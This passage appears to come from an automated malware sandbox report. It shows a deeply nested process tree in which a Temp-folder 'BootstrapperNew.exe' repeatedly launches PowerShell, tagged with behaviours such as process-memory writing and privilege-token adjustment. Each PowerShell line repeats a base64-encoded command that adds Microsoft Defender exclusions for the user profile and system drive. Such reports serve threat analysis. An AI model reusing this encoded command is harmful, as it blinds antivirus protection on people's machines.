        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        8⤵
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:2336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:1900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        10⤵
        
        PID:540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        11⤵
        Checks computer location settings
        
        PID:2568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        12⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        12⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        13⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        13⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        14⤵
        
        PID:3612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4164
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        15⤵
        Drops file in Windows directory
        
        PID:2820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        16⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        17⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5296
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        17⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        18⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        18⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        19⤵
        Checks computer location settings
        
        PID:5908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        20⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6104
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        20⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        21⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        21⤵
        
        PID:5444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        22⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        22⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        23⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        23⤵
        
        PID:5500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        24⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5528
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        24⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        25⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        25⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        26⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6300
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        26⤵
        
        PID:6380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        27⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        27⤵
        Drops file in Windows directory
        
        PID:6684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        28⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6924
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        28⤵
        
        PID:6932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        29⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        29⤵
        Drops file in Windows directory
        
        PID:5412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        30⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        30⤵
        
        PID:6324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        31⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6384
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        31⤵
        System Location Discovery: System Language Discovery
        
        PID:5752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        32⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7004
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        32⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        33⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        33⤵
        System Location Discovery: System Language Discovery
        
        PID:7020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        34⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        34⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        35⤵
        
        PID:6784
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        35⤵
        
        PID:6404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        36⤵
        
        PID:6988
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        36⤵
        
        PID:6832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        37⤵
        
        PID:7092
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        37⤵
        
        PID:7180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
